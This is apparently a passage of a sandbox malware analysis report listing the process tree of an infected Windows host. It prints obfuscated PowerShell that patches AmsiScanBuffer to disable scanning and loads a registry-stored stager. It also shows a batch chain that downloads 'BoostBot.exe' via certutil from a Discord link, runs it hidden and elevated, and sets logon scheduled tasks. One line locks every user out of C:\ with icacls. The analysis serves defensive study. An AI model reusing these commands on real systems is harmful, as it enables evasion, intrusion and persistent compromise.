$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+'n'+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+'af'+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$ANMcYIfEAaxeHT=$CIYScuxnOXTwn.GetMethod('G'+'e'+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+'d'+''+'d'+'r'+'e'+'ss',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dCuubAXpyfrOHAxcoPE=UXiVYKZntfWC @([String])([IntPtr]);$vwnLtIuNkEtWtuMtLTgHaM=UXiVYKZntfWC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HYCwMHzuwpZ=$CIYScuxnOXTwn.GetMethod(''+'G'+''+[Char](101)+'t'+'M'+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+'ndl'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'ne'+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$GhhWiDjEltDfLu=$ANMcYIfEAaxeHT.Invoke($Null,@([Object]$HYCwMHzuwpZ,[Object]('L'+'o'+'a'+'d'+''+'L'+''+[Char](105)+''+'b'+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$bGamKQmPaKJfBhnYz=$ANMcYIfEAaxeHT.Invoke($Null,@([Object]$HYCwMHzuwpZ,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$LpoOymu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GhhWiDjEltDfLu,$dCuubAXpyfrOHAxcoPE).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.dl'+'l'+'');$EWBXjhOionsaHrGwH=$ANMcYIfEAaxeHT.Invoke($Null,@([Object]$LpoOymu,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+'f'+'f'+''+'e'+''+[Char](114)+'')));$krKNdFDtEJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bGamKQmPaKJfBhnYz,$vwnLtIuNkEtWtuMtLTgHaM).Invoke($EWBXjhOionsaHrGwH,[uint32]8,4,[ref]$krKNdFDtEJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EWBXjhOionsaHrGwH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bGamKQmPaKJfBhnYz,$vwnLtIuNkEtWtuMtLTgHaM).Invoke($EWBXjhOionsaHrGwH,[uint32]8,0x20,[ref]$krKNdFDtEJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+'WA'+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MoiVDfeoEfWd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xiDphjtnvOIhQb,[Parameter(Position=1)][Type]$gnBHAbKIdx)$MklNvKKzyTI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+'l'+[Char](101)+''+'g'+'a'+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+'led'+','+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+'as'+[Char](115)+',A'+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$MklNvKKzyTI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xiDphjtnvOIhQb).SetImplementationFlags('R'+'u'+''+[Char](110)+'ti'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$MklNvKKzyTI.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+'eB'+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+'t'+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$gnBHAbKIdx,$xiDphjtnvOIhQb).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+','+'M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $MklNvKKzyTI.CreateType();}$UqXwimbXuTElJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'N'+[Char](97)+'t'+'i'+'ve'+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$wBsBcucvFQHoQO=$UqXwimbXuTElJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+'c'+'A'+'d'+'d'+''+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TbLuHAAVHTaBFrKfvXZ=MoiVDfeoEfWd @([String])([IntPtr]);$kpZJpnjKYhADkabyziQaJs=MoiVDfeoEfWd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UYgXnbgYljE=$UqXwimbXuTElJ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+'ul'+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+'l'+[Char](108)+'')));$NdlDqzljlVENWd=$wBsBcucvFQHoQO.Invoke($Null,@([Object]$UYgXnbgYljE,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+'A'+'')));$SboDwCKRAUxRKyJfj=$wBsBcucvFQHoQO.Invoke($Null,@([Object]$UYgXnbgYljE,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'ua'+[Char](108)+'P'+[Char](114)+''+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$JhUZUao=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NdlDqzljlVENWd,$TbLuHAAVHTaBFrKfvXZ).Invoke(''+'a'+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$NaHbBazsVYRzzbggW=$wBsBcucvFQHoQO.Invoke($Null,@([Object]$JhUZUao,[Object]('A'+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$ChrUJoDnww=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SboDwCKRAUxRKyJfj,$kpZJpnjKYhADkabyziQaJs).Invoke($NaHbBazsVYRzzbggW,[uint32]8,4,[ref]$ChrUJoDnww);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NaHbBazsVYRzzbggW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SboDwCKRAUxRKyJfj,$kpZJpnjKYhADkabyziQaJs).Invoke($NaHbBazsVYRzzbggW,[uint32]8,0x20,[ref]$ChrUJoDnww);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NPvtWPuQzEKm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CyhzwZaXlKgcEs,[Parameter(Position=1)][Type]$fvZQGAAtAr)$ISFUfziujJc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+''+'t'+'ed'+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+'g'+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+'mory'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+'p'+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+','+''+'P'+'u'+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+'C'+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$ISFUfziujJc.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+'lN'+[Char](97)+''+'m'+''+[Char](101)+''+','+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CyhzwZaXlKgcEs).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$ISFUfziujJc.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+'i'+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+'',$fvZQGAAtAr,$CyhzwZaXlKgcEs).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $ISFUfziujJc.CreateType();}$yJCSjBaOdgWhH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+'W'+'in'+[Char](51)+'2'+'.'+'U'+[Char](110)+'sa'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+[Char](101)+'th'+[Char](111)+''+[Char](100)+''+'s'+'');$GOIIbohPgtiYtQ=$yJCSjBaOdgWhH.GetMethod(''+[Char](71)+''+'e'+'t'+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+'t'+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kFDWmCToGVjUQyneMWd=NPvtWPuQzEKm @([String])([IntPtr]);$wqzwwTkUmanscqxhuIRujc=NPvtWPuQzEKm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kPVKfSPwquf=$yJCSjBaOdgWhH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+'a'+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$VpaqSiMEuHdYUh=$GOIIbohPgtiYtQ.Invoke($Null,@([Object]$kPVKfSPwquf,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+'A'+'')));$TzonjmiajuQxJJPAh=$GOIIbohPgtiYtQ.Invoke($Null,@([Object]$kPVKfSPwquf,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$xiAFLKd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VpaqSiMEuHdYUh,$kFDWmCToGVjUQyneMWd).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$meNTAZlqlWXVNiEEA=$GOIIbohPgtiYtQ.Invoke($Null,@([Object]$xiAFLKd,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'an'+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+'r')));$JtBObWTSQG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TzonjmiajuQxJJPAh,$wqzwwTkUmanscqxhuIRujc).Invoke($meNTAZlqlWXVNiEEA,[uint32]8,4,[ref]$JtBObWTSQG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$meNTAZlqlWXVNiEEA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TzonjmiajuQxJJPAh,$wqzwwTkUmanscqxhuIRujc).Invoke($meNTAZlqlWXVNiEEA,[uint32]8,0x20,[ref]$JtBObWTSQG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OFT'+'W'+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4528

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1144

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1200

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1432

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1580

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1892

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2004

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:1868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2600

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2612

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2796

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2844

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2872

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:2976

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3112

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
3⤵
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4488

C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
"C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:4560

C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4168

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1280

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
6⤵
- Executes dropped EXE
PID:4220

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /delete /tn "$sxr-powershell" /f
6⤵
PID:4012

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vmuThGHW6X5Z.bat" "
6⤵
PID:1976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4452

C:\Windows\SysWOW64\chcp.com
chcp 65001
7⤵
PID:3224

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:1776

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
6⤵
- Executes dropped EXE
PID:4932

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:3064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1324

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
5⤵
- Executes dropped EXE
PID:4992

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
5⤵
- Creates scheduled task(s)
PID:2220

C:\Windows\system32\icacls.exe
icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
3⤵
- Modifies file permissions
PID:5096

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
3⤵
PID:5048

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
3⤵
- Views/modifies file attributes
PID:2300

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3868

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4440

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:936

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:2956

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4080

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4212

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:3692

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4128

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:5104

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

